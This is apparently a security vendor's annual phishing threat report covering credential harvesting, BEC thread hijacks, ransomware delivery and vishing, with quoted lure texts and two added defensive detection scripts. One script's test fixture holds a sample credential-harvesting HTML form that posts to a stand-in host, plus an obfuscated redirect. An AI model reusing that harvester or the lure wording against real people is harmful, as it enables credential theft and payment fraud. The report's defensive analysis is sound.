Introduction


It started out with a phish; how did it end up like this? Inspired by the lyrics of the song Mr. Brightside by The Killers, we’ve seen first-hand how phishing threats can end up as million-dollar ransom demands, financial fraud and other damages to organizations. We invite you to “open up [your] eager eyes” as we explore the threats targeting your inbox.


The past twelve months have brought unique challenges as the global COVID pandemic forced organizations to rapidly adopt new business procedures amid remote operations and disrupted supply chains. While it had always been business-critical, email became even more crucial.

The same can be said for the other side, as threat actors focused on email to launch a variety of attacks. Infamous incidents discovered and played out in the past year included the SolarWinds breach, which highlighted the deadly impact of supply-chain attacks, and numerous “successful” ransomware campaigns, including the Colonial Pipeline attack on public infrastructure and the Kaseya supply-chain ransomware attack, prompting multiple FBI alerts and an executive order on improving cybersecurity.


While there’s still plenty of uncertainty as we approach the post-COVID world, one thing is 
clear: inboxes aren’t clean. Threats ranging from nuisance spam to difficult-to-discover but 
costly business email compromise (BEC) continue to target organization inboxes. 


We analyzed a sampling of over 31 million threats discovered from May 1, 2020 to April 30, 
2021 across organizations and found several interesting patterns. Read along to learn more. 
Key Findings

IDENTITY IS THE KEY

As the saying goes, go for the lowest hanging fruit. In phishing, that fruit is the credential. Credential harvesters are the most common threat type in email.

Nearly 10 percent (9.3%) of malicious attacks involve credential harvesters.

Why bring a battering ram, when you can just steal the keys to the door? Attackers look for the path of least resistance, so if you can spend three minutes crafting an email to steal credentials versus spending hours devising a way past firewalls and other protections, why wouldn’t you go that route?
LOW VOLUME, HIGH RETURNS

Business Email Compromise (BEC) is the latest example of researching your target. These attacks involve a lot more care and feeding than traditional phishing attacks.

Although BECs make up a tiny volume of attacks, they represent the highest financial damage. In our data, BEC accounted for 1.3% of attacks but would have resulted in over $354 million in direct losses.

The average BEC request in our findings is nearly $1.5 million.

TRUST NO ONE, LEAST OF ALL YOUR “FRIENDS”

Identity deception using tactics like spoofing, domain impersonation and display name impersonation is used in nearly 9% of attacks.

These attacks showcase how easily an attacker can deceive the average user to achieve their goals. In many cases, it’s as simple as a display name change to seriously wreck someone’s weekend and destroy their trust in who they’re dealing with.

Speaking of trust...
Key Findings — continued

THE ENEMY YOU KNOW

What’s even better than pretending to be Jan from accounting? How about being America’s favorite retailer with a special offer just for you! Attackers impersonate known brands to add legitimacy to phishing campaigns.

The top 10 most impersonated brands make up over 56% of all impersonation-based phishing attacks.

These attacks will always present a challenge to most users. Things like the latest trends in the news or entertainment can spell big bucks for attackers.

WHAT ABOUT SPAM?

End user training does wonders in helping foster a culture of security in an organization. However, not every end user has their CISSP. True positive phishing submissions are amazing for the safety of an organization.

However, more than 92% of user-reported phish are not malicious and are actually benign, spam or bulk mail.

Training isn’t enough to stop the white noise heard by the security admins.
It Started out with a Phish
How did it end up like this?

Unlike the song by The Killers, there isn’t a “brightside” to phish. (And you can blame us for getting the song stuck in your head.)

With unerring consistency, almost all breaches begin with an innocuous-looking phish or email. Low tech, low maintenance and practically free, phishing can be a profitable business model for attackers with low infrastructure costs due to the prevalence of inexpensive cloud-based email providers like Gmail. By using these legitimate hosting services, attackers can sneak under the email security radar straight into inboxes.

What looks like a harmless email from a long-standing vendor or even a routine email from the IT department can harbor devastating consequences if clicked, leading to shutdowns, loss of data or even financial costs in the millions. We cannot stress enough the importance of stopping these threats before they reach users.

Here are the analyzed threat samples we discovered from May 1, 2020 to April 30, 2021, broken down below by volume.

[Chart: threat samples by volume. Legend entries legible in the source: Identity Deception, Link, Attachment, Scam 1.48%, Dropper 0.37%, Other 0.11%. Further values shown are 92.27%, 9.33%, 8.96%, 8.96%, 3.31% and 2.39%, but their labels did not survive extraction. Detailed threat type descriptions can be found in the Appendix of the report.]
[Figure: annotated screenshot of a credential-harvesting email, captioned “… OF ATTACKS INVOLVED CREDENTIAL HARVESTING” (the percentage did not survive extraction). Callouts: IMPERSONATED SENDER, no-reply@sharepointonline[.]com, displayed as “SharePoint Online | via SharePoint”; REPLY-TO MISMATCH, help.desk.message.alert@mail[.]com; IMAGE OF A SHAREPOINT EMAIL, reading “Your organization has shared a secured document with you via Microsoft SharePoint”, naming a file “March Financial Reports”, stating that the attachment only works for the direct recipient of the message and prompting the user to sign in with their Microsoft account; HTML ATTACHMENT CONTAINS CREDENTIAL HARVESTER, which renders a “Sign in to view the document” page.]
Credential Harvesters: Compromised Identities

When users open the front door, attackers don’t need any backdoors. The largest threat type by volume in our findings, “credential harvester” can refer to either the attack method or the malware that steals a user's valid password, which is then used to gain access to unauthorized data.

Also considered a type of social engineering attack, credential harvesters typically start as a phishing email with a link to a fake login page made to look like a legitimate organization’s site. Alternatively, an email with weaponized attachments can also install credential-harvesting malware onto an end user’s system.

While the websites and lures used range in sophistication, the most convincing attacks require advanced technology and trained security analysts to identify. By impersonating recognized brands and using legitimate cloud hosting services (e.g. Google Drive, Microsoft OneDrive, etc.) as part of their attack infrastructure, these attacks can bypass security systems and “security aware” users.
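The three signals called out in the SharePoint example (a Reply-To that does not match the From domain, a display name borrowing a brand the sending domain is not authorised for, and an HTML attachment that carries a login form or a script redirect like the one in the vishing example later in this report) can be checked mechanically at the gateway. The following is an added example written for this report, not code from Area 1; the brand allowlist, the sample message and all domains in it are constructed, with the reserved .example and .invalid TLDs standing in for real ones.

```python
"""Triage checks for the credential-harvester lures discussed above.

Flags three signals the report calls out: a Reply-To that does not match the
From domain, a display name that borrows a brand the sending domain is not
authorised for, and an HTML attachment carrying a login form or a script
redirect. Standard library only, so it runs offline.
"""
import email
import email.policy
import re
from email.utils import parseaddr
from typing import List

# Constructed allowlist: brand keyword -> domains allowed to send as that brand.
BRAND_DOMAINS = {
    "sharepoint": {"sharepointonline.example", "microsoft.example"},
    "microsoft": {"microsoft.example"},
}

PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
SCRIPT_REDIRECT = re.compile(
    r"window\.location|location\.(?:href|replace)|unescape\(|atob\(", re.I)


def sender_domain(header_value: str) -> str:
    """Lower-cased domain part of an address header ('' when absent)."""
    _name, address = parseaddr(header_value or "")
    return address.rpartition("@")[2].lower()


def triage(raw_message: str) -> List[str]:
    """Return the findings for one raw RFC 822 message; an empty list means clean."""
    msg = email.message_from_string(raw_message, policy=email.policy.default)
    findings = []
    display_name, _addr = parseaddr(msg.get("From", ""))
    from_dom = sender_domain(msg.get("From", ""))
    reply_dom = sender_domain(msg.get("Reply-To", ""))

    # 1. Reply-To pointing at a domain other than the From domain: the
    #    "REPLY-TO MISMATCH" callout in the SharePoint example.
    if reply_dom and reply_dom != from_dom:
        findings.append(f"reply-to mismatch: From={from_dom} Reply-To={reply_dom}")

    # 2. Display-name impersonation: the name claims a brand but the domain
    #    is not one that brand sends from.
    for brand, allowed in BRAND_DOMAINS.items():
        if brand in display_name.lower() and from_dom not in allowed:
            findings.append(f"display name impersonates {brand!r} from {from_dom}")

    # 3. HTML attachments: a password field means a credential form was
    #    shipped inside the mail; a location change or decoder call is the
    #    JavaScript redirect pattern used in the vishing example.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):
            body = body.decode("utf-8", "replace")
        if PASSWORD_FIELD.search(body):
            findings.append(f"html attachment {name!r} contains a password form")
        if SCRIPT_REDIRECT.search(body):
            findings.append(f"html attachment {name!r} contains a script redirect")
    return findings


# Constructed sample modelled on the SharePoint lure; not a real capture.
SAMPLE_LURE = """\
From: "SharePoint Online" <no-reply@sharepointoniine.example>
Reply-To: help.desk.message.alert@mail.example
To: finance@corp.example
Subject: Your organization has shared a secured document with you
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Sign in to view the document.
--b1
Content-Type: text/html; name="March Financial Reports.htm"
Content-Disposition: attachment; filename="March Financial Reports.htm"

<html><body><form method="post" action="https://collector.invalid/login">
<input type="email" name="u"><input type="password" name="p"></form>
<script>window.location.href = unescape("https%3A%2F%2Fcollector.invalid");</script>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_LURE):
        print(finding)
```

None of the three checks needs the attacker's domain to have a bad reputation yet, which is the gap the report describes newly registered look-alike domains slipping through.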
Supply Chain Attacks
Targeting Organizational Weaknesses (aka Your Friends’)

The SolarWinds and Kaseya incidents catapulted supply chain attacks into the spotlight due to their widespread impact and continued repercussions. As in those cases, where many of the victims were renowned security organizations themselves, anyone can become a victim when attackers exploit trusted partners and third-party vendors.

Supply chain attacks don’t all require surreptitiously sabotaging software to succeed. In fact, phishing attacks are one of the most common ways to start a supply chain attack. By compromising a trusted partner first, attackers can launch business email compromise (BEC) or ransomware attacks that result in financial loss in the millions. We’ll explore these two attack types in more detail in the following sections.
TOP 7 ATTACK TECHNIQUES USED IN SUPPLY CHAIN ATTACKS

1. Compromised Partner Account + New Domain: Attacker uses a new domain to send out phishing campaigns or reference new domains within a message from a compromised partner.

2. Compromised Partner IP / Domain: Attacker compromises a known good organization, sends messages using their domain and IP address.

3. Compromised Partner Account + Malicious Payload: Attacker compromises a partner, leveraging a known employee name to send out messages containing a malicious payload.

4. Compromised Partner Account: Attacker compromises a valid organization. In some instances, organizations sending out phishing campaigns may be fronts or owned by threat actors.

5. Compromised Partner Account + Infiltrated Supply-Chain BEC: Attacker uses a compromised partner to send out BEC messages with no payload, often hijacking benign email threads to divert payment.

6. Compromised Partner Account + URL Campaign: Attacker uses a compromised partner’s domain to send phishing emails with links that host credential harvesters or malicious payloads.

7. Partner Spoofing: Attacker spoofs a partner without actually compromising the partner. Domain spoofs or registered look-alike partner domains are common.
Business Email Compromise (BEC):
Low Volume, Low Tech, High Payouts

BEC attacks range from the easily recognizable spoofed sender to sophisticated supply chain attacks.

Type 3 and Type 4 both rely on exploiting established trust with existing partners and vendors. By adding in tactics like spoofing sender domains, hosting attachments in legitimate services and using timely lures, these malware-less attacks can create detection challenges for many security systems. Many Type 4 BECs also use partner account-takeover attacks where the partner victim is unaware they have been compromised. Later, the attacker pivots the thread to the attacker account to divert payment.
[Figure: screenshot of a BEC lure email tagged [EXTERNAL], dated February 16, 2021, from “Caroline”, subject “Updated Terms, Current Statement & Pending Invoice”, sent to undisclosed recipients and carrying the banner “This message is from an EXTERNAL SENDER - be CAUTIOUS, particularly with links and attachments.” The body announces that payment terms are moving to net 30 and that updated terms and conditions and a current statement are attached, then continues: “This is another reminder that we are yet to receive the $57,400 owed on invoice #10237. Please be aware that, as per my terms, we may charge you additional interest on payment received more than 30 days past its due date, find attached a copy of the invoice in case the original copy was lost or deleted. Again, please reach out if you have any questions on this payment. Otherwise, please organize for settlement of this invoice immediately.” The “attachment” is a link to a tresorit.com file-sharing page.]

BECS MADE UP ONLY 1.3% OF ATTACKS BUT WOULD HAVE RESULTED IN OVER $354 MILLION IN DIRECT LOSSES

TYPE 1: Spoofed Executive, Sender or Domain. CXO as lures; inter-organization impersonation via spoofed sender and domains.

TYPE 2: Compromised Employee Account. Employees as lures; intra-organization impersonation via employee account takeover.

TYPE 3: Spoof Impersonating Supplier.

TYPE 4: Infiltrated Supplier / Supply Chain Attack.

Types 3 and 4 share the same pattern: supply chain / partner employees as lures; inter-organization impersonation via spoof (Type 3) or supplier account takeover (Type 4); a long con with delayed calls-to-action.
Business Email Compromise (BEC): continued

BEC TYPE 4 EXAMPLE

These attacks use partner account-takeovers to hijack legitimate, benign conversation threads before pivoting the conversation to the attacker’s account.

THE AVERAGE BEC REQUEST IS NEARLY $1.5 MILLION

THE MEDIAN BEC ATTEMPT IS OVER $200K
$4+ Million BEC fraud stopped

The attacker compromises a partner’s account (“Jeffrey”), then hijacks a benign conversation thread. Sending from a malicious look-alike domain, the attacker pivots the thread to the attacker's account. The look-alike sender domain is identical to the benign sender domain but ends in .co instead of .com.

[Figure: screenshot of the hijacked thread, subject “Re: … Payment”. A message sent as “Jeffrey” on April 27, 2021 at 11:17 AM reads: “Can you please advise on when the outstanding balance for this transaction will be paid? Please let me know as I've got important information to share with you regarding our new payment options to be used for this transaction. Your swift response is greatly appreciated.” A follow-up asks the recipient to cancel the check already sent and pay by ACH to new account details instead. The rest of the screenshot text is not legible in the source.]

$250K BEC fraud with COVID lure stopped

The attacker compromises a partner’s account (“Yannick”) to hijack a benign email thread, pivoting the thread to the attacker’s account. COVID lures are used to make the attack more convincing and timely. The malicious look-alike sender domain used is nearly identical to the benign sender domain; the attacker just added an extra letter (e.g. “buy.com” vs. “buvy.com” [not the actual domain used]).

[Figure: annotated screenshot of the thread. Callout “LEGITIMATE, BENIGN EMAIL THREAD”: on Tuesday, April 13, 2021 at 9:30 AM, Tanya replies to Yannick (subject “RE: [EXTERNAL] … Invoices - February”) that the expected payment date is April 27, 2021 and that it should come via check, and asks whether anything else is needed. Callout “ATTACKER HIJACKS THREAD AND PIVOTS TO ATTACKER ACCOUNT”: the reply sent as “Yannick” thanks Tanya for the information, claims a staff member was diagnosed with COVID-19 last week so the office is working from home in self-isolation and cannot receive check payments until further notice, asks her to initiate an ACH/wire transfer on the advised payment date instead, and promises to send “subsidiary LLC bank information” on receipt of her confirmation.]
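In both thread-hijack examples above the pivot shows up in the From domain of one reply: the same name with .com swapped for .co, or one letter added. The check below walks a thread in order and flags any message whose sender domain is a near-match of a domain already in the conversation. It is an added example written for this report, not Area 1 code; the thread is constructed, and the reserved .example and .invalid TLDs stand in for the real .com/.co pair.

```python
"""Look-alike sender detection for the thread-hijack BECs described above.

Every message in a thread is compared against the domains that already took
part in it; a domain that is almost, but not exactly, one of them is the
"pivot to the attacker's account" the report describes.
"""
from typing import Dict, List, Optional, Set


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(candidate: str, known: str) -> Optional[str]:
    """Explain why `candidate` resembles `known`; None if identical or unrelated.

    Assumes two-label domains (name.tld); strip subdomains before calling.
    """
    c, k = candidate.lower(), known.lower()
    if c == k:
        return None
    c_name, _, c_tld = c.rpartition(".")
    k_name, _, k_tld = k.rpartition(".")
    # The $4M case: vendor name unchanged, .com became .co.
    if c_name == k_name and c_tld != k_tld:
        return f"same name, TLD swapped (.{k_tld} -> .{c_tld})"
    # The $250K case: one extra letter in the name ("buy" vs "buvy").
    if c_tld == k_tld and levenshtein(c_name, k_name) == 1:
        return "one character added, removed or changed"
    return None


def domain_of(address: str) -> str:
    return address.rpartition("@")[2].lower()


def find_pivots(thread: List[Dict[str, object]]) -> List[str]:
    """Flag messages whose From domain is a look-alike of a domain already in
    the thread. `thread` is chronological; each item has 'from' and 'to' keys."""
    seen: Set[str] = set()
    alerts = []
    for index, message in enumerate(thread):
        dom = domain_of(message["from"])
        for known in sorted(seen):
            reason = lookalike_reason(dom, known)
            if reason:
                alerts.append(f"message {index}: {dom} looks like {known} ({reason})")
        seen.add(dom)
        seen.update(domain_of(rcpt) for rcpt in message["to"])
    return alerts


# Constructed thread mirroring the check-to-ACH pivot; the third message is
# the attacker's reply from the look-alike domain.
SAMPLE_THREAD = [
    {"from": "jeffrey@vendorco.example", "to": ["tanya@buyerco.example"]},
    {"from": "tanya@buyerco.example", "to": ["jeffrey@vendorco.example"]},
    {"from": "jeffrey@vendorco.invalid", "to": ["tanya@buyerco.example"]},
]

if __name__ == "__main__":
    for alert in find_pivots(SAMPLE_THREAD):
        print(alert)
```

A pivot to a domain unrelated to anything in the thread is not caught here; that case is left to sender-reputation and display-name controls.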
Ransomware: The End Stage

High-profile cases of ransomware such as the Colonial Pipeline attack, which also used credential harvesting, by the now-defunct ransomware group DarkSide have prompted federal government warnings on their severity and disruption to services, not to mention their high financial costs.

In the case of Colonial Pipeline, the ransomware payment alone cost the company [amount not legible in source], with additional system restoration costs estimated to be in the tens of millions. U.S. Homeland Security has cited losses from NotPetya, another “famous” ransomware variant, as high as [amount not legible in source]. Ransom demands have also increased, with the Kaseya ransomware claiming the largest demand on record at [amount not legible in source].

The delivery of these devastating attacks is almost always via an email phish. In fact, the ransomware categorization only happens at the very end of the attack chain, when data is already lost and a ransom demanded. Other than backing up data and having a recovery plan, the most important thing an organization can do is to prevent that initial phish from getting in in the first place.
FIVE RECENT RANSOMWARE TRENDS

1. Extortion is being used in conjunction with or as a backup for ransoms.

2. Phishing has replaced remote code execution (RCE) as the preferred delivery method.

3. The time between ransomware deployment to asset compromise has exponentially shortened.

4. Ransomware is increasingly sent via nested links in emails.

5. Threat actors are actively hiring in open marketplaces for “developers”.
Ransomware: How Ransomware Gets Executed On Victim

Ransomware attacks are typically delivered through phishing attacks. In this example, a compromised sender sends a phishing email to a partner company. Nested links lead to the download of the BazarLoader malware, which eventually leads to infection with Ryuk ransomware.

Phishing emails are the first stage in the delivery mechanism.

[Figure: the phishing email, tagged EXTERNAL EMAIL, sent from a compromised sender with a Reply-To address different from the sender. The lure claims the sender needs to debit fees from the recipient’s payroll “during next 2,5 hours” and tells the recipient to copy a Google Docs link and paste it into the browser “to preview” a document titled “Customer Complaint”.]

First stage loaders establish persistence via remote access trojans (RATs) for recon.

The attacker uses a legitimate service (Google Docs) to host a seemingly benign page, seen below. If clicked, the link on this page leads to the download of the malicious payload.

[Figure: Google Docs page titled “Customer Complaint #10/13 for company employees”, marked “Published by Google Docs - Report Abuse”, with a download link.]

Ultimate payload is delivered.

RANSOMWARE IS THE FINAL STAGE, NOT THE FIRST
Brand Impersonation: Fake It Til You Make It

Organizations use their branding to establish reputation and cultivate trust with their customers. Attackers take advantage of this trust by using brand impersonation in their attacks.

Similar to identity deception, which we track separately, brand impersonation occurs when a threat actor impersonates a trusted company or well-known brand to add legitimacy to their phishing attack. Using stolen branding and images that are often identical to the legitimate brand, attackers use any means available to get victims to click.

As we saw in the earlier BEC example with COVID lures, these impersonations often focus on trending brands or events. With COVID as the main headline for the majority of 2020 and into 2021, it’s no surprise that the World Health Organization (WHO) was the #1 most impersonated brand, beating annual “favorites” like Google, Microsoft and Target.
Top 10 Impersonated Brands

1. World Health Organization
2. Google
3. Microsoft
4. Target
5. Amazon
6. [logo not legible in source]
7. Marketo (An Adobe Company)
8. LinkedIn
9. Facebook
10. T-Mobile

COVID Spotlight

As the use of web conference tools increased during the pandemic, attackers also began impersonating web conference brands. Here are the top web conference brands ranked based on how often they're spoofed.

[Figure: logos of Zoom, Cisco Webex, Google Meet and a fourth brand that is not legible in the source; the ranking order did not survive extraction.]

IDENTITY DECEPTION IS USED IN NEARLY 9% OF ATTACKS

BRAND IMPERSONATION MAKES UP 2.4% OF ATTACKS BASED ON VOLUME
Vishing: A Marriage of Inconvenience

An interesting trend in the intersection of voice and email threats is vishing. Vishing, the short form for “voice phishing,” usually refers to the practice of leaving fake voice messages in hopes that victims will call back to provide personal information which will be used in other attacks.

In our case, we have observed attackers combining email and voice vectors by sending emails with attachments of a voicemail recording, media file or a link to one. We have also observed attackers sending emails that had no malicious payloads, just simply a phone number. The attackers purported to be from reputable companies to entice targets to call the number and reveal personal information, such as bank details and credit card numbers. In some cases, the attackers would also attempt to walk victims through a series of steps on their computers that would result in the download of malware or would enable remote access to their system.

Cloud providers and traditional email security providers like Microsoft tend to miss these attacks, especially when the malicious link is embedded in an attachment. Combining obfuscations and redirections, attackers know these messages end up reaching the end user and will continue using these techniques until stopped.

Like many other attacks, an increase in vishing during a specific time period can indicate vishing campaigns. In our data, we saw a significantly high volume of vishing attacks in mid-September 2020, with smaller campaigns occurring around the winter holidays, February and May of 2021.

As seen in the chart below, vishing, like most cyber attacks, occurs most frequently on weekdays when victims are more likely to check their emails.

[Chart: vishing volume over time from 2020 into 2021, y-axis from 0 to 150,000, with the largest peak in mid-September 2020.]
Vishing Example

In this example, the attacker uses display name spoofing to impersonate a legitimate organization. The email contains an .htm attachment purporting to be a voicemail message. In actuality, the attachment contains a JavaScript redirection and obfuscated URL to redirect the victim to a credential harvester impersonating a Microsoft login page.

[Figure: screenshot of the email, from a sender displayed as “System” at 7:38 AM, subject “New (22 seconds) message from (570) 3029-**** on February 18, 2021, 8:34:59 AM”, with the attachment VM_745281.htm.]
How Did We End Up Here?

MORE THAN 92% OF USER-SUBMITTED REPORTS ARE NOT MALICIOUS

Unlike spam and commodity malware, targeted attacks make up a relatively low volume, yet can cause substantial damage, as examples in this report indicate.

Attackers use a variety of tactics and techniques to evade detection from email providers and secure email gateways (SEGs). Tactics like leveraging stolen credentials fly under the radar since legitimate accounts and logins are used. Newly created domains used to spoof legitimate domains do not have any malicious reputation, so can easily be missed by legacy security systems.
DOES SECURITY AWARENESS TRAINING AND USER-REPORTED PHISH WORK?

Security awareness training can be beneficial from an educational and awareness perspective, but it’s not always effective at stopping threats. Many attacks use sophisticated impersonation techniques that fool all but the most skilled, trained professionals. Not to mention that with account takeover attacks, the victim typically does not even know they have been compromised.

User-submitted phish is often inaccurate, and relying on these reports can increase time and resource costs for both end users and the IT/security department. In our findings, more than 92.1% of user-submitted “phish” were actually benign, spam or bulk mail. At the same time, security teams chasing after false positives means less time to find and investigate actual threats.
Missed Threats within a One Month Period

Each row of missed threats in the chart below makes up less than 0.5% of that month’s email traffic, but it just takes one missed threat to cause a security disaster. Our last column may also help put these threats in a different perspective.

Organization Industry    Email Security System Used    Missed Threats    Total Email Volume
Insurance                [not legible in source]       517,968           103,099,539
Software                 [not legible in source]       [not legible]     [not legible]
Pharmaceutical           Proofpoint                    448,440           432,611,141
Food and Beverage        Cisco Email Security          105,603           420,088,334
Education                Custom                        90,763            142,672,221

In Other Words....

More than half a million chances of a successful attack. [Figure not legible] inboxes per day for users to deal with. 3,500+ user submissions a day IT has to deal with. 45,000+ investigative hours for security teams (at only 30 min per incident).
Recommendations

Cyber criminals are always innovating, and staying a step ahead of them can be a challenge without the right people, processes and tools. Here are our top recommendations to keep targeted threats out of your organization’s inboxes.

LOCK DOWN IDENTITY

With attackers taking the easy route of stealing credentials, secure accounts and identities by adding additional protection like multi-factor authentication (MFA). Never reuse passwords and always change default passwords. Train users to avoid clicking on malicious content in phishing emails, but also train them on what to do if they fall for the phish.

ESTABLISH PROTOCOLS AND PROCEDURES AGAINST FINANCIAL FRAUD

Establish and train on procedures to prevent financial loss in the case of BEC and financial fraud, such as requiring multiple approvers (plus further safeguards not legible in the source) before transferring funds to new accounts.

TAKE A ZERO TRUST APPROACH WITH EMAIL

Email is a core communication vehicle for organizations, and with attackers’ rampant use of spoofing, it’s imperative to verify all communication that happens within email. Remove implicit trust by assessing the validity of messages beyond the sender to reduce risk from compromised partners. Choose a security system that can detect compromises and apply controls around those communications to extend zero trust to email.
DON’T ALWAYS BELIEVE WHAT YOU SEE

Brand impersonations have gotten better with attackers hiring designers and stealing logos. Invest in solutions with advanced technologies like optical character recognition (OCR) parsing and natural language understanding (NLU) modeling to accurately detect phishing emails using impersonation and identity deception techniques.
FOCUS ON PREEMPTION

Threats are always easier to deal with before they reach end users. Implement security awareness, but don’t rely on users to be the front line defense. With the majority of modern attacks starting with a phishing email, deploy a preemptive email security solution to keep threats out of your organization in the first place. Choose a cloud-based, dynamically scalable solution that uses advanced technologies to track attacker infrastructure to truly preempt attacks before they reach inboxes.

AREA 1

Area 1 Security uses advanced techniques, wide-scale threat indexing and attacker infrastructure tracking to preemptively detect and stop malicious attacks like those seen in this report from ever reaching inboxes.

To find out more about the attacks we’re discovering, or to see what threats are already in your organization, we invite you to SCHEDULE A COMPLIMENTARY PHISHING RISK ASSESSMENT.
Appendix: Threat Type Descriptions


Credential Harvester — Credential harvesters are sites set up by an attacker to deceive users into providing their login credentials. This type of attack presents the user with a page that imitates an account login page. Unwitting users who enter their credentials unknowingly provide attackers with the credentials to their accounts.

Identity Deception — Identity deception occurs when an attacker or someone with malicious intent sends an email claiming to be someone else. The mechanisms and tactics of this vary widely. Some tactics include registering domains that look similar (aka domain impersonation), are spoofed, or utilize display name tricks to appear to be sourced from a trusted domain. Other variations include sending email utilizing domain fronting and high reputation web services platforms such as G Suite and O365.

Link — When clicked, a link will open the user’s default web browser and render the data referenced in the link, or open an application directly (e.g. a PDF). Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL look like it links to something benign while it is actually malicious. Malicious links can lead to arbitrary code execution or Remote Code Execution (RCE), credential harvesting, click fraud, unwanted installs or other compromises.
Attachment — An attachment is any file attached to an email that, when opened or executed, performs a series of actions set by an attacker. Attachments can often masquerade as other file types by using mismatching extensions or otherwise deceptive file names. Attachments can lead to malware installation, such as backdoors and remote access trojans (RATs), or contain links to other malicious content and files.

Brand Impersonation — Brand impersonation occurs when a threat actor impersonates a trusted company or well-known brand to add legitimacy to their phishing attack.

Extortion — Extortion is a tactic used to coerce an entity to perform a set of actions they would not otherwise perform. Extortion is identified when an attacker contacts intended victims with instructions to follow in order to avoid compromise or release of sensitive data. Unfortunately, even following attacker instructions can still result in compromise. For this report, scareware is also included in this category. Scareware is a form of malware which uses social engineering to cause shock, anxiety, or the perception of a threat to manipulate users into downloading and/or buying unwanted software. Usually the purported malware isn’t real and the software is non-functional or malware itself.


Scam — A scam is a broad category of fraud with the purpose of enticing a victim to provide money with the promise of a significant sum in return. The victim can be led to believe they are making an investment, which may involve the sender promising to pay the victim a large sum to transfer or process money, or may simply involve funding a fraudulent company, for example.

BEC — Business Email Compromise (BEC) is an increasingly common, effective and costly targeted email attack that is designed to trick recipients into transferring funds, typically through forged invoices, to scammer accounts. BEC falls into various categories based on its sophistication, ranging from using a spoofed email to compromising a vendor in a supply-chain attack. In the latter example, it is not uncommon for the process to play out over several weeks while the scammer is grooming the victim by email and/or occasionally by phone. Our BEC ebook discusses the different types of BEC in more detail.

Dropper — A dropper is a malicious executable binary whose purpose is to decrypt, unobfuscate and/or extract a secondary malicious payload. Along with the malicious payload, the dropper may open a benign lure document to serve as a distraction for the human target during the infection process. Typically, a dropper is extracted from a carrier file such as a Microsoft Office document, PDF, or other common container-style document. Carrier files are usually engineered with an exploit that causes the viewing application to begin executing the attacker's code, leading to execution of the dropper and installation of malware.

Other — For the purpose of this report, other threat detection categories with statistically insignificant numbers have been consolidated into the “other” category. This includes IP policy (detection based on a customer-specific policy), target development (attacker information-gathering to facilitate a successful attack) and encrypted email (phishing messages that contain encrypted content as a means to circumvent email security systems), among others.


